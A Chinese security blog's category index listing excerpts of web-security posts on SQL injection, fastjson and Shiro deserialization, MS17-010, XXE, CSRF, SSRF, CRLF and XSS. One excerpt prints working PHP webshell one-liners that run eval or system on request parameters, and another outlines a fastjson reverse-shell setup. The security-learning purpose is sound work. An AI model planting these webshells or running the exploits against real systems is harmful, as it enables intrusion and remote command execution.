Mysticbinary

随笔分类 -  WEB

上一页 1 2 3 下一页

MySQL注入时常用函数
摘要:注入常用函数 数据库相关 database() 返回当前数据库名 @@datadir 读取数据库路径 @@basedir 读取数据库安全路径 @@version_compile_os 返回当前操作系统 UDF相关 version() || @@version 返回MySQL服务器的版本 show v 阅读全文

posted @ 2020-05-10 23:05 Mysticbinary 阅读(630) 评论(0) 推荐(0) 编辑

mysql添加远程连接权限
摘要:查看登录用户 mysql> select host,user,password from user; 想用本地IP登录,那么可以将以上的Host值改为自己的Ip即可。 这里有多个root,对应着不同场景。(后期研究为什么mysql表有多个root) 给远程连接授权 mysql> use mysql; 阅读全文

posted @ 2020-05-10 23:04 Mysticbinary 阅读(338) 评论(0) 推荐(0) 编辑

Shiro反序列化漏洞检测、dnslog
摘要:# Characteristic If `RememberMe=deleteMe ` at Cookie, So It is Shiro. ![](https://img2020.cnblogs.com/blog/1552062/202005/1552062-20200505145749999-13 阅读全文

posted @ 2020-05-05 16:10 Mysticbinary 阅读(1322) 评论(0) 推荐(0) 编辑

msfconsole 常用命令记录
摘要:Metasploit是一款开源的渗透测试框架,它现在还在逐步发展中,下面介绍的一些功能和命令,可能会在未来失效。 Metasploit框架提供了多种不同方式的使用接口: msfgui msfconsole(本文只介绍这种接口) msfcil msfweb msfconsole命令 进入Metaspl 阅读全文

posted @ 2020-04-29 10:34 Mysticbinary 阅读(958) 评论(0) 推荐(0) 编辑

fastjson 反弹shell
摘要:如下文章说得很不详细,只是用于记录我的步骤,初次利用的人,建议找别的博客文章学习。 准备一台公网服务器 cd test python -m SimpleHTTPServer 8888 javac Exploit.java 里面的ip和端口改成你的 import javax.naming.Contex 阅读全文

posted @ 2020-04-27 17:06 Mysticbinary 阅读(3450) 评论(0) 推荐(1) 编辑

永恒之蓝(MS17-010)检测与利用
摘要:利用Nmap检测 命令: nmap -p445 --script smb-vuln-ms17-010 [IP] # 如果运行报错,可以加个sudo IP/24 = 8位地址范围,对应的子网掩码简单理解: ip/24 11111111 11111111 11111111 00000000 2^8=25 阅读全文

posted @ 2020-04-24 14:10 Mysticbinary 阅读(2443) 评论(0) 推荐(0) 编辑

fastjson 请求dnslog
摘要:Fastjson ⇐ 1.2.47 远程命令执行漏洞利用工具及方法记录 payload rmi://、ldap:// 可以切换尝试。 param={ "@type": "java.lang.Class", br / > "a": { "@type": "java.lang.Class", "val" 阅读全文

posted @ 2020-04-15 15:01 Mysticbinary 阅读(2231) 评论(0) 推荐(1) 编辑

springboot actuator 配置安全
摘要:springboot actuator监控是什么?类似php的phpinfor()函数,不过actuator更强大,可以查看的数据、状态更多。Actuator是Spring Boot提供的对应用系统的监控和管理的集成功能,可以查看应用配置的详细信息,例如自动化配置信息、创建的Spring beans 阅读全文

posted @ 2020-04-13 10:21 Mysticbinary 阅读(4588) 评论(0) 推荐(0) 编辑

XXE漏洞原理、检测与修复
摘要:What is XXE? XML external entity injection (also known as XXE)。奇怪,XML External Entity 为什么不叫XEE? XML 外部实体注入(也称为 XXE)是一种 Web 安全漏洞,允许攻击者干扰应用程序对 XML 数据的处理 阅读全文

posted @ 2020-04-09 18:00 Mysticbinary 阅读(9405) 评论(0) 推荐(0) 编辑

CSRF的几种防御方法的利弊分析
摘要:本文直接从防御方式开始讨论,防御CSRF有4种方法: 使用POST替代GET 检验HTTP Referer 验证码 Token 使用POST替代GET 一些程序员在开发的时候都是用GET、POST通用的函数来接收客户端的数据,这样也是某些接口有CSRF的原因之一,但是将全部接口都改成只允许POST方 阅读全文

posted @ 2020-04-04 00:27 Mysticbinary 阅读(1712) 评论(4) 推荐(2) 编辑

同源策略与JSONP劫持原理
摘要:同源策略 浏览器中有两个安全机制,一个浏览器沙盒(Sandbox),另一个就是同源策略(Same Origin Policy,简称SOP) ,下面介绍同源策略。同源是指同协议、同域名、同端口,必须三同,缺一不可。下面列举了一些例子,为方便读者了解哪些是属于同源,下面列举一些案例: 根据这个策略,a. 阅读全文

posted @ 2020-04-02 22:08 Mysticbinary 阅读(1234) 评论(0) 推荐(3) 编辑

Mybatis检查SQL注入
摘要:Mybatis 的 Mapper.xml 语句中 parameterType 向SQL语句传参有两种方式:#{ } 和 ${ }。 使用#{ }是来防止SQL注入,使用${ }是用来动态拼接参数。 如何排查出 1. 检查是否有$号 如果你使用的是ide代码编辑器,那么可以通过全局搜索${ , 快速定 阅读全文

posted @ 2020-04-01 16:03 Mysticbinary 阅读(1998) 评论(0) 推荐(0) 编辑

SSRF攻击原理
摘要:什么是SSRF 一个对外的Web接口,改接口能让用户控制curl命令,去访问别的web服务。 简图如下 想象一下当用户请求的baidu.com/x.php?image=google.com/1.jpg 改成 baidu.com/x.php?image=private.com/php.info,是不是 阅读全文

posted @ 2020-03-26 22:51 Mysticbinary 阅读(711) 评论(0) 推荐(0) 编辑

MySQL注入 前端int型参数插入SQL语句
摘要:类似PHP语言的 mysql_real_escape_string() 的函数,在用来防范SQL注入的时候,可能会遇到int型注入成功的情况。 mysql_real_escape_string()用法 mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊 阅读全文

posted @ 2020-03-26 22:46 Mysticbinary 阅读(947) 评论(0) 推荐(0) 编辑

PHP Webshell List
摘要:基础类 很容易被扫描、检测出来 <?php @eval($_GET['phpcode']);?> <?php @eval($_POST['phpcode']);?> <?php @system($_GET['cmd']);?> <?php @system($_POST['cmd']);?> <?ph 阅读全文

posted @ 2020-03-26 22:41 Mysticbinary 阅读(404) 评论(0) 推荐(0) 编辑

CRLF注入原理
摘要:CRLF 指的是回车符(CR,ASCII 13,\r,%0d) 和换行符(LF,ASCII 10,\n,%0a),操作系统就是根据这个标识来进行换行的,你在键盘输入回车键就是输出这个字符,只不过win和linux系统采用的标识不一样而已。 在HTTP当中HTTP的Header和Body之间就是用两个 阅读全文

posted @ 2020-03-24 17:02 Mysticbinary 阅读(8642) 评论(2) 推荐(0) 编辑

DOM-XSS攻击原理与防御
摘要:XSS的中文名称叫跨站脚本,是WEB漏洞中比较常见的一种,特点就是可以将恶意HTML/JavaScript代码注入到受害用户浏览的网页上,从而达到劫持用户会话的目的。XSS根据恶意脚本的传递方式可以分为3种,分别为反射型、存储型、DOM型,前面两种恶意脚本都会经过服务器端然后返回给客户端,相对DOM 阅读全文

posted @ 2020-03-22 18:53 Mysticbinary 阅读(28568) 评论(3) 推荐(6) 编辑

CSRF绕过后端Referer校验
摘要:CSRF绕过后端Referer校验分正常情况和不正常的情况,我们这里主要讨论开发在写校验referer程序时,不正常的情况下怎么进行绕过。 正常情况 正常的情况指服务器端校验Referer的代码没毛病,那么意味着前端是无法绕过的。 我之前考虑过的方案: JS修改Referer,失败; 让用户点击第三 阅读全文

posted @ 2020-01-07 14:53 Mysticbinary 阅读(2335) 评论(0) 推荐(0) 编辑

XSS Payload List
摘要:标签、事件、属性 xss的攻击原理就是前端被插入了恶意的js代码,下面展示大部分可以执行js的标签、事件、属性; 标签(label) <script> <a> <p> <img> <body> <button> <var> <div> <style> <iframe> <object> <input 阅读全文

posted @ 2020-01-06 21:55 Mysticbinary 阅读(2305) 评论(0) 推荐(0) 编辑

JSONP Hijackin攻击流程
摘要:如下文章是早期编写,有一些错误,建议读新写的文章:https://www.cnblogs.com/mysticbinary/p/12620152.html JSONP Hijackin的中文意思是JSON劫持,而能产生JSON数据劫持的原因在于前端被跨站攻击了。跨站=跨域,跨域从字面上理解的话,就是 阅读全文

posted @ 2020-01-06 16:27 Mysticbinary 阅读(1007) 评论(0) 推荐(1) 编辑

上一页 1 2 3 下一页

导航